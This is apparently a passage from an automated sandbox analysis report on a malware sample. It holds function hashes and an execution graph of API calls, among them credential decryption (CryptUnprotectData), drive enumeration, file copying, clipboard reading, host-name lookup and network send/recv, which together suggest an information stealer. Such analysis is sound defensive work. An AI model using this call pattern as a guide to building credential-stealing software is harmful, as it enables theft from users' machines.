                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2996ca39634b6ca34a67f042933d67eb7305388054ace9d745093fcd8d0fd6be
                                                                                                                                                                                                                                                              • Instruction ID: 008571055cb1b7af36614406d921d6b81142ffde92e0f6dd9489cc07d8da320f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2996ca39634b6ca34a67f042933d67eb7305388054ace9d745093fcd8d0fd6be
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79512575E09208CBEB14DFA9E498BEDBBF2FB49721F10902AE415A7294DB344C49CF50
                                                                                                                                                                                                                                                              Function 05A8CEF9 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 915440388b1d83d62d833ecc261efc670e31f6f34b5a61c81d09adecb8a7afaf
                                                                                                                                                                                                                                                              • Instruction ID: 1dbb19cc1588b893c5babe6dc4e457d8117bde8d172578bf1d6169aa52479743
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 915440388b1d83d62d833ecc261efc670e31f6f34b5a61c81d09adecb8a7afaf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E94155B1E016199BDB08CFABD94069EFBF3BFC8300F14C07AD958AB254EB3059468B54
                                                                                                                                                                                                                                                              Function 05AE0006 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 97b74e623bad45cda4d2ae4221d94d0a6ac06b0f3966df7096970917a1c12583
                                                                                                                                                                                                                                                              • Instruction ID: c725dfe677992b86738886d4b374550ed3a10c0f2324ae9a63aca35966c69052
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97b74e623bad45cda4d2ae4221d94d0a6ac06b0f3966df7096970917a1c12583
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7410675D056488FDB05CFAAD848B9DBBF2FF89300F18C0AAD448AB255DB744986CF10
                                                                                                                                                                                                                                                              Function 05AE0040 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088396328.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5ae0000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d86768db4d14d1af4d8c8cc7ac17b3156b9369360bcd5de7c4876b7093f34b56
                                                                                                                                                                                                                                                              • Instruction ID: 8557f31139e4688d47f0c05b9e6ae3e0a16d28b5fe561c79867d51cab479d9d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d86768db4d14d1af4d8c8cc7ac17b3156b9369360bcd5de7c4876b7093f34b56
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8741A174E056188BEB14CFAAD948BDDBBF6BB89300F14C0AAD409AB254DBB41985CF54
                                                                                                                                                                                                                                                              Function 05A86F01 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5ee97c6453863f233144461782e14229a38ccef14c120f6bcb32d1b2c85dc488
                                                                                                                                                                                                                                                              • Instruction ID: 042e24465f910ee839f615036651240ef6548995e31b2f12cb185148e779608a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ee97c6453863f233144461782e14229a38ccef14c120f6bcb32d1b2c85dc488
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70319D71E156188BEB5DCF5B8C0169AFAFBAFC9300F14C0FA980CA7254DB704A858E51
                                                                                                                                                                                                                                                              Function 05A86F10 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b933ed940a53546bf87dad65d6e1bb5dd127c749e94dcfe8f1f1dfb1bb2133ab
                                                                                                                                                                                                                                                              • Instruction ID: ff5944244238150f05a9986dbece8e2cd13d0ee7d254f1d980a160a185332bb4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b933ed940a53546bf87dad65d6e1bb5dd127c749e94dcfe8f1f1dfb1bb2133ab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30318B71E156188BEB1DDF6B8C0069AFAFBAFC9300F14D1BA950DA6254DB704A818F11
                                                                                                                                                                                                                                                              Function 05A85CA8 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 234a060b6cb7009f54579a4ee2553e9802a0ab3bc231f0adf3f1051760f7c8e5
                                                                                                                                                                                                                                                              • Instruction ID: 028e6c7b18d11825860f3dcb633ece6595cb19b0478299b869cc642421b8c209
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 234a060b6cb7009f54579a4ee2553e9802a0ab3bc231f0adf3f1051760f7c8e5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC21A7B1D056189BEB18DF6BC9447DEBAF3AFC9300F14C0AAD809AB255DB740A85CF51
                                                                                                                                                                                                                                                              Function 02E5A540 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a818bd0e771c4a4fc763a3b1c3610c7bc0dc1eda85d8327c93d660619b84892f
                                                                                                                                                                                                                                                              • Instruction ID: b82cc77d8434e46cb81a4c3f531f8a1e4edcfd2ed25ffe4cc98075bf569b5bbf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a818bd0e771c4a4fc763a3b1c3610c7bc0dc1eda85d8327c93d660619b84892f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 083194B0D056188BEB58CF6BD84878EFAF7AFC8304F54D1AAC40CA7264EB7405858F01
                                                                                                                                                                                                                                                              Function 02E5A531 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: fb9acb74de9c097add1bd69ae34bdc13ca246ff52bae635b59e8ddbb6a090ba2
                                                                                                                                                                                                                                                              • Instruction ID: 42d44efd759b86e6247de84d27b7dac06650fccaafcd230572d7e78a5e7690fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9acb74de9c097add1bd69ae34bdc13ca246ff52bae635b59e8ddbb6a090ba2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF2187B1D116188BEB58CF6BD94978DFAF3AFC8304F54C1AAD41CA7264EB7405868F01
                                                                                                                                                                                                                                                              Function 05A85C98 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ea6142f67c7b89f625f80608df76deaae16290de7034c341cc9da7eb3e328e34
                                                                                                                                                                                                                                                              • Instruction ID: 747ea691efdb2e5f09b5c0a38c69da124d82dfb9937324ae7c322d4b5ae30c95
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea6142f67c7b89f625f80608df76deaae16290de7034c341cc9da7eb3e328e34
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE21FC71E046189BEB1CDF6BCD456DEFAF3AFC9300F54C0BAD809AA215DB300A468E51
                                                                                                                                                                                                                                                              Function 05A8F948 Relevance: 7.9, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12088164245.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5a80000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (Ar$4'=r$4'=r$4'=r$4'=r$pAr
                                                                                                                                                                                                                                                              • API String ID: 0-254864904
                                                                                                                                                                                                                                                              • Opcode ID: 359a11412a264f944fe6bf6b7eee09e7b4591ed9a9de001052a6d923f30d44d9
                                                                                                                                                                                                                                                              • Instruction ID: d1c2d922e07d27aea3aa6a32c2ee9f1caf92aebc2b473515d7745513fc63d1e6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 359a11412a264f944fe6bf6b7eee09e7b4591ed9a9de001052a6d923f30d44d9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91D17F36600115DFCB19DFA8C944EA9BBB3FF88310F0584A8E509AB272D736ED55DB90

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:13.2%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:16.9%
                                                                                                                                                                                                                                                              Total number of Nodes:563
                                                                                                                                                                                                                                                              Total number of Limit Nodes:39
                                                                                                                                                                                                                                                              execution_graph 13631 41a043 13632 41a42d 13631->13632 13634 419efc 13631->13634 13637 41a261 13631->13637 13634->13631 13634->13632 13634->13637 13638 43fad0 13634->13638 13644 43c160 LdrInitializeThunk 13634->13644 13636 41a403 CryptUnprotectData 13636->13632 13637->13636 13639 43faf0 13638->13639 13641 43fb8e 13639->13641 13645 43c160 LdrInitializeThunk 13639->13645 13642 43fc7e 13641->13642 13646 43c160 LdrInitializeThunk 13641->13646 13642->13634 13644->13634 13645->13641 13646->13642 13647 4189c3 13648 4189c8 13647->13648 13658 43ac40 13648->13658 13650 4189e3 13651 418ba2 13650->13651 13656 418c4b 13650->13656 13666 41d4e0 13651->13666 13653 418c3a 13654 418e9d 13655 41d4e0 4 API calls 13654->13655 13655->13653 13656->13653 13656->13654 13662 43f7c0 13656->13662 13659 43ac4a 13658->13659 13661 43ac9e 13658->13661 13659->13661 13689 43c160 LdrInitializeThunk 13659->13689 13661->13650 13663 43f7e0 13662->13663 13664 43f96e 13663->13664 13690 43c160 LdrInitializeThunk 13663->13690 13664->13656 13667 41d565 13666->13667 13668 41d50f 13666->13668 13669 41d88c 13666->13669 13667->13653 13668->13667 13668->13668 13668->13669 13691 414a00 13668->13691 13671 414a00 4 API calls 13669->13671 13673 41d90d 13671->13673 13672 41d66d 13674 414a00 4 API calls 13672->13674 13675 414a00 4 API calls 13673->13675 13677 41d6f7 13674->13677 13676 41d9b0 13675->13676 13676->13676 13678 414a00 4 API calls 13676->13678 13679 414a00 4 API calls 13677->13679 13680 41da48 13678->13680 13681 41d781 13679->13681 13682 414a00 4 API calls 13680->13682 13683 414a00 4 API calls 13681->13683 13685 41db13 13682->13685 13684 41d832 13683->13684 13686 414a00 4 API calls 13684->13686 13687 414a00 4 API calls 13685->13687 13686->13669 13688 41db7c 13687->13688 13689->13661 13690->13664 13692 414a20 13691->13692 13729 43f5e0 13692->13729 13694 414b4d 13694->13694 13695 43f5e0 LdrInitializeThunk 13694->13695 13696 414ded 13695->13696 13697 415013 13696->13697 13698 414f55 13696->13698 13703 414e6e 13696->13703 13724 414f34 13696->13724 13750 43a8a0 13696->13750 13697->13672 13754 43a8d0 13698->13754 13702 43a8a0 RtlAllocateHeap 13702->13703 13703->13702 13703->13703 13717 414f18 13703->13717 13704 414f5b 13705 414fb3 13704->13705 13784 43c160 LdrInitializeThunk 13704->13784 13706 41548f 13705->13706 13707 415478 13705->13707 13708 41544c 13705->13708 13710 4154b2 13705->13710 13718 41549d 13705->13718 13727 415593 13705->13727 13758 43a920 13705->13758 13716 43ac40 LdrInitializeThunk 13706->13716 13715 43f5e0 LdrInitializeThunk 13707->13715 13708->13706 13708->13707 13708->13710 13708->13718 13708->13727 13772 43acd0 13708->13772 13710->13718 13723 43fad0 LdrInitializeThunk 13710->13723 13710->13727 13780 43f9c0 13710->13780 13712 43c160 LdrInitializeThunk 13712->13724 13715->13706 13716->13718 13753 43c160 LdrInitializeThunk 13717->13753 13718->13672 13723->13710 13724->13697 13724->13698 13724->13704 13724->13712 13733 4385a0 13724->13733 13785 43c160 LdrInitializeThunk 13727->13785 13730 43f5f0 13729->13730 13731 43f76e 13730->13731 13786 43c160 LdrInitializeThunk 13730->13786 13731->13694 13735 4385b0 13733->13735 13738 4386f5 13735->13738 13787 43c0e0 13735->13787 13796 43c160 LdrInitializeThunk 13735->13796 13737 43a8d0 RtlFreeHeap 13739 438aa6 13737->13739 13740 43ab30 LdrInitializeThunk 13738->13740 13743 438a8d 13738->13743 13739->13724 13746 438738 13740->13746 13741 438a91 13742 43ac40 LdrInitializeThunk 13741->13742 13742->13743 13743->13737 13744 43c0e0 3 API calls 13744->13746 13745 43a8d0 RtlFreeHeap 13745->13746 13746->13741 13746->13744 13746->13745 13747 438ab3 13746->13747 13749 43c160 LdrInitializeThunk 13746->13749 13748 43a8d0 RtlFreeHeap 13747->13748 13748->13741 13749->13746 13797 43da00 13750->13797 13752 43a8aa RtlAllocateHeap 13753->13724 13755 43a911 13754->13755 13756 43a8e3 13754->13756 13755->13704 13757 43a8ff RtlFreeHeap 13756->13757 13757->13755 13759 43a940 13758->13759 13761 43a97e 13759->13761 13799 43c160 LdrInitializeThunk 13759->13799 13760 415440 13768 43ab30 13760->13768 13761->13760 13763 43a8a0 RtlAllocateHeap 13761->13763 13765 43a9da 13763->13765 13764 43a8d0 RtlFreeHeap 13764->13760 13767 43aa2e 13765->13767 13800 43c160 LdrInitializeThunk 13765->13800 13767->13764 13769 43abde 13768->13769 13770 43ab41 13768->13770 13769->13708 13770->13769 13801 43c160 LdrInitializeThunk 13770->13801 13773 43ace2 13772->13773 13775 41546a 13772->13775 13773->13775 13777 43ad3e 13773->13777 13802 43c160 LdrInitializeThunk 13773->13802 13775->13706 13775->13707 13775->13710 13775->13718 13775->13727 13776 43ae1e 13776->13775 13804 43c160 LdrInitializeThunk 13776->13804 13777->13776 13803 43c160 LdrInitializeThunk 13777->13803 13782 43f9e0 13780->13782 13781 43fa7e 13781->13710 13782->13781 13805 43c160 LdrInitializeThunk 13782->13805 13784->13705 13785->13718 13786->13731 13788 43c106 13787->13788 13789 43c145 13787->13789 13790 43c13a 13787->13790 13791 43c0f8 13787->13791 13794 43c138 13787->13794 13795 43c125 RtlReAllocateHeap 13788->13795 13793 43a8d0 RtlFreeHeap 13789->13793 13792 43a8a0 RtlAllocateHeap 13790->13792 13791->13788 13791->13789 13791->13794 13792->13794 13793->13794 13794->13735 13795->13794 13796->13735 13798 43da10 13797->13798 13798->13752 13798->13798 13799->13761 13800->13767 13801->13769 13802->13777 13803->13776 13804->13775 13805->13781 13807 40d0c6 13808 40d0cc 13807->13808 13809 40d0db CoUninitialize 13808->13809 13810 40d100 13809->13810 13811 40cecb 13812 40cedb 13811->13812 13841 424010 13812->13841 13814 40cee1 13851 424750 13814->13851 13816 40cf01 13855 424a00 13816->13855 13818 40cf21 13865 427950 13818->13865 13822 40cf53 13887 4299c0 13822->13887 13824 40cf7c 13891 432be0 OpenClipboard 13824->13891 13826 40cfa5 13827 424010 4 API calls 13826->13827 13828 40cfc6 13827->13828 13829 424750 3 API calls 13828->13829 13830 40cfe6 13829->13830 13831 424a00 3 API calls 13830->13831 13832 40d006 13831->13832 13833 427950 3 API calls 13832->13833 13834 40d02f 13833->13834 13835 427cd0 5 API calls 13834->13835 13836 40d038 13835->13836 13837 4299c0 LdrInitializeThunk 13836->13837 13838 40d061 13837->13838 13839 432be0 6 API calls 13838->13839 13840 40d08a 13839->13840 13845 424070 13841->13845 13842 4244af 13900 4223a0 13842->13900 13844 4241a0 13844->13814 13844->13844 13845->13842 13845->13844 13845->13845 13846 4242c6 13845->13846 13849 43f7c0 LdrInitializeThunk 13845->13849 13846->13846 13847 424431 GetLogicalDrives 13846->13847 13848 43f7c0 LdrInitializeThunk 13847->13848 13848->13844 13850 4242a1 13849->13850 13850->13842 13850->13844 13850->13846 13854 424800 13851->13854 13852 4249d5 13852->13816 13854->13852 13918 420540 13854->13918 13856 424a0e 13855->13856 13922 43e370 13856->13922 13858 424aa7 13860 424b61 13858->13860 13864 4249e0 13858->13864 13936 43e870 13858->13936 13926 43e4e0 13860->13926 13863 43e370 LdrInitializeThunk 13863->13864 13864->13818 13864->13864 13866 427980 13865->13866 13868 4279de 13866->13868 13951 43c160 LdrInitializeThunk 13866->13951 13867 40cf4a 13875 427cd0 13867->13875 13868->13867 13870 43a8a0 RtlAllocateHeap 13868->13870 13872 427a76 13870->13872 13871 43a8d0 RtlFreeHeap 13871->13867 13874 427afe 13872->13874 13952 43c160 LdrInitializeThunk 13872->13952 13874->13871 13874->13874 13953 427cf0 13875->13953 13877 427ce4 13877->13822 13878 427cd9 13878->13877 13973 438ad0 13878->13973 13880 43f5e0 LdrInitializeThunk 13886 428540 13880->13886 13881 43f9c0 LdrInitializeThunk 13881->13886 13882 42878c CopyFileW 13882->13886 13883 42856b 13883->13822 13884 43fad0 LdrInitializeThunk 13884->13886 13886->13880 13886->13881 13886->13882 13886->13883 13886->13884 13980 43c160 LdrInitializeThunk 13886->13980 13888 429a00 13887->13888 13888->13888 13889 429b28 13888->13889 13890 43f5e0 LdrInitializeThunk 13888->13890 13889->13824 13890->13888 13892 432c04 GetClipboardData 13891->13892 13893 432d2d 13891->13893 13894 432c21 GlobalLock 13892->13894 13895 432d27 CloseClipboard 13892->13895 13893->13826 13897 432c37 13894->13897 13895->13893 13896 432d1b GlobalUnlock 13896->13895 13897->13896 13898 432c65 GetWindowLongW 13897->13898 13899 432ccf 13898->13899 13899->13896 13901 43f5e0 LdrInitializeThunk 13900->13901 13903 4223e0 13901->13903 13902 422b18 13902->13844 13903->13902 13904 43a8a0 RtlAllocateHeap 13903->13904 13905 422440 13904->13905 13912 4224c3 13905->13912 13915 43c160 LdrInitializeThunk 13905->13915 13906 422a83 13908 43a8d0 RtlFreeHeap 13906->13908 13910 422a95 13908->13910 13909 43a8a0 RtlAllocateHeap 13909->13912 13910->13902 13917 43c160 LdrInitializeThunk 13910->13917 13912->13906 13912->13909 13914 43a8d0 RtlFreeHeap 13912->13914 13916 43c160 LdrInitializeThunk 13912->13916 13914->13912 13915->13905 13916->13912 13917->13910 13919 420570 13918->13919 13919->13919 13920 4223a0 3 API calls 13919->13920 13921 4205bf 13920->13921 13921->13852 13923 43e390 13922->13923 13925 43e4ae 13923->13925 13946 43c160 LdrInitializeThunk 13923->13946 13925->13858 13927 43e500 13926->13927 13928 43e59e 13927->13928 13947 43c160 LdrInitializeThunk 13927->13947 13929 43a8a0 RtlAllocateHeap 13928->13929 13933 424b96 13928->13933 13931 43e641 13929->13931 13935 43e6fe 13931->13935 13948 43c160 LdrInitializeThunk 13931->13948 13932 43a8d0 RtlFreeHeap 13932->13933 13933->13863 13933->13864 13935->13932 13937 43e890 13936->13937 13939 43e92e 13937->13939 13949 43c160 LdrInitializeThunk 13937->13949 13938 43ec08 13938->13858 13939->13938 13940 43a8a0 RtlAllocateHeap 13939->13940 13942 43e99a 13940->13942 13945 43ea5e 13942->13945 13950 43c160 LdrInitializeThunk 13942->13950 13943 43a8d0 RtlFreeHeap 13943->13938 13945->13943 13946->13925 13947->13928 13948->13935 13949->13939 13950->13945 13951->13868 13952->13874 13954 427d30 13953->13954 13954->13954 13955 43a920 3 API calls 13954->13955 13956 427d8a 13955->13956 13957 43ab30 LdrInitializeThunk 13956->13957 13958 427d96 13957->13958 13962 427e49 13958->13962 13981 43af80 13958->13981 13960 428323 13963 43ac40 LdrInitializeThunk 13960->13963 13961 42831a 13965 43ac40 LdrInitializeThunk 13961->13965 13962->13960 13962->13961 13962->13962 13964 428239 13962->13964 13972 42832c 13962->13972 13989 43aee0 13962->13989 13963->13972 13964->13878 13965->13960 13967 43f5e0 LdrInitializeThunk 13967->13972 13968 43f9c0 LdrInitializeThunk 13968->13972 13969 42878c CopyFileW 13969->13972 13970 43fad0 LdrInitializeThunk 13970->13972 13972->13964 13972->13967 13972->13968 13972->13969 13972->13970 13993 43c160 LdrInitializeThunk 13972->13993 13978 438b00 13973->13978 13974 43e370 LdrInitializeThunk 13974->13978 13975 43e870 3 API calls 13975->13978 13976 438c68 13976->13886 13978->13974 13978->13975 13978->13976 13997 43eff0 13978->13997 14007 43c160 LdrInitializeThunk 13978->14007 13980->13886 13983 43afd0 13981->13983 13982 43b778 13982->13962 13988 43b00e 13983->13988 13994 43c160 LdrInitializeThunk 13983->13994 13985 43b721 13985->13982 13995 43c160 LdrInitializeThunk 13985->13995 13987 43c160 LdrInitializeThunk 13987->13988 13988->13982 13988->13985 13988->13987 13991 43af00 13989->13991 13990 43af4e 13990->13962 13991->13990 13996 43c160 LdrInitializeThunk 13991->13996 13993->13972 13994->13988 13995->13982 13996->13990 13998 43f001 13997->13998 13999 43f17e 13998->13999 14008 43c160 LdrInitializeThunk 13998->14008 14000 43f3cb 13999->14000 14002 43a8a0 RtlAllocateHeap 13999->14002 14000->13978 14003 43f1f9 14002->14003 14005 43f30e 14003->14005 14009 43c160 LdrInitializeThunk 14003->14009 14004 43a8d0 RtlFreeHeap 14004->14000 14005->14004 14007->13978 14008->13999 14009->14005 14010 42d4cf 14011 42d4f7 14010->14011 14012 42d5eb FreeLibrary 14011->14012 14013 42d5fb 14012->14013 14014 42d60b GetComputerNameExA 14013->14014 14016 42d660 14014->14016 14015 42d6cb GetComputerNameExA 14017 42d730 14015->14017 14016->14015 14016->14016 14018 42e2cd 14020 42e300 14018->14020 14019 42e43e 14020->14019 14022 43c160 LdrInitializeThunk 14020->14022 14022->14019 14023 408710 14025 40871f 14023->14025 14024 40890c ExitProcess 14025->14024 14026 4088f5 14025->14026 14027 4087ac GetCurrentProcessId GetCurrentThreadId 14025->14027 14036 43c0c0 14026->14036 14028 4087d1 14027->14028 14029 4087d5 SHGetSpecialFolderPathW GetForegroundWindow 14027->14029 14028->14029 14030 408888 14029->14030 14030->14026 14035 40c5e0 CoInitializeEx 14030->14035 14039 43d9e0 14036->14039 14038 43c0c5 FreeLibrary 14038->14024 14040 43d9e9 14039->14040 14040->14038 14041 41cdd2 14042 41ce38 14041->14042 14043 41cddd 14041->14043 14047 41e800 14043->14047 14045 41ce06 14045->14042 14046 41ce1d shutdown 14045->14046 14046->14042 14049 41e811 14047->14049 14050 41e854 14047->14050 14048 41ea56 send 14048->14050 14049->14048 14050->14045 14051 41c7d5 14057 43ddb0 14051->14057 14054 41c820 14055 41e800 send 14054->14055 14056 41c94a 14055->14056 14058 41c7f0 setsockopt 14057->14058 14058->14054 14059 41cc58 14060 41cc70 14059->14060 14060->14060 14063 41eb40 14060->14063 14062 41cce3 14064 41eb55 14063->14064 14066 41ec8c 14063->14066 14065 41eb67 recv 14064->14065 14065->14066 14067 41eb7f 14065->14067 14066->14062 14067->14066 14068 41ebf1 recv 14067->14068 14075 41ec05 14067->14075 14068->14075 14070 41ee4d 14071 41eebd 14070->14071 14072 41ef1f 14070->14072 14080 4203f0 14071->14080 14090 420270 14072->14090 14075->14066 14076 420180 14075->14076 14077 42019d 14076->14077 14079 42020e 14076->14079 14078 4201e6 recv 14077->14078 14077->14079 14078->14077 14078->14079 14079->14070 14081 42040a 14080->14081 14085 42044e 14080->14085 14082 420414 14081->14082 14081->14085 14083 420432 14082->14083 14084 420510 14082->14084 14088 41e800 send 14083->14088 14089 42043b 14083->14089 14100 41f1f0 14084->14100 14086 41e800 send 14085->14086 14085->14089 14086->14089 14088->14089 14089->14066 14091 4202a7 14090->14091 14092 42029b 14090->14092 14093 4202d1 14091->14093 14096 420351 14091->14096 14097 4202ee 14091->14097 14092->14091 14094 4202d8 14092->14094 14093->14066 14094->14093 14095 4203f0 send 14094->14095 14095->14093 14096->14093 14098 41e800 send 14096->14098 14099 41f1f0 send 14097->14099 14098->14093 14099->14093 14101 41f1f9 14100->14101 14103 41f254 14100->14103 14102 41e800 send 14101->14102 14102->14103 14103->14089 14104 40d619 14107 412540 14104->14107 14106 40d61f 14114 41255a 14107->14114 14108 412561 14108->14106 14111 43c160 LdrInitializeThunk 14111->14114 14113 43a8d0 RtlFreeHeap 14113->14114 14114->14108 14114->14111 14114->14113 14115 40ac10 14114->14115 14119 43f3e0 14114->14119 14123 43fcd0 14114->14123 14118 40aca0 14115->14118 14116 43c0e0 3 API calls 14116->14118 14117 40acdd 14117->14114 14118->14116 14118->14117 14121 43f3f0 14119->14121 14120 43f578 14120->14114 14121->14120 14129 43c160 LdrInitializeThunk 14121->14129 14125 43fcf0 14123->14125 14124 43fd8e 14127 43fe7e 14124->14127 14131 43c160 LdrInitializeThunk 14124->14131 14125->14124 14130 43c160 LdrInitializeThunk 14125->14130 14127->14114 14129->14120 14130->14124 14131->14127 14132 41635b 14133 416380 14132->14133 14135 41643e 14133->14135 14150 43c160 LdrInitializeThunk 14133->14150 14137 41653e 14135->14137 14148 43c160 LdrInitializeThunk 14135->14148 14139 41663e 14137->14139 14151 43c160 LdrInitializeThunk 14137->14151 